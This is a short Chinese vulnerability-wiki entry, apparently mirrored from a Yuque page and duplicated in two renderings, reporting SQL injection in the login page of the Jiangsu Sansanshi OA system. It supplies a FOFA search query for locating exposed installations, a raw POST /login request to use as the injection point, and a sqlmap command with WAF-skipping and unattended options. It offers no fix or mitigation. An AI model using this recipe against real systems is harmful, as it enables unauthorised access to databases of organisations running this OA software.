fofamini-wiki

登录白背景

源码

江苏叁拾叁 OA 存在 sql 注入

一、漏洞简介

江苏叁拾叁信息技术有限公司 OA 存在 sql 注入。

二、影响版本

江苏叁拾叁-OA

三、资产测绘

fofaapp="江苏叁拾叁-OA"
特征

四、漏洞复现

POST /login HTTP/1.1
Host: xx.xx.xx.xx
Content-Length: 23
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/92.0.4515.131 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,applic
ation/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=AD52C9F9D7D46303431351876BBA1536
Connection: close

username=1&password=1

sqlmap

sqlmap -r 1.txt  --skip-waf --batch

原文: https://www.yuque.com/xiaokp7/ocvun2/sci7xyxnnedmms2v

# 江苏叁拾叁 OA 存在 sql 注入

# 一、漏洞简介
江苏叁拾叁信息技术有限公司 OA 存在 sql 注入。

# 二、影响版本

- 江苏叁拾叁-OA

# 三、资产测绘

- fofa`app="江苏叁拾叁-OA"`
- 特征

![image.png](./img/4Qh1iKEScHYiYDZU/1699024861984-8041d8c9-3f0e-41c2-b6f2-597fe9bcd028-026111.png)

# 四、漏洞复现
```
POST /login HTTP/1.1
Host: xx.xx.xx.xx
Content-Length: 23
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/92.0.4515.131 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,applic
ation/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=AD52C9F9D7D46303431351876BBA1536
Connection: close

username=1&password=1
```
sqlmap
```
sqlmap -r 1.txt  --skip-waf --batch
```
![image.png](./img/4Qh1iKEScHYiYDZU/1699025200615-a0dd512e-b6be-4d75-8911-de36991ee272-604712.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/sci7xyxnnedmms2v>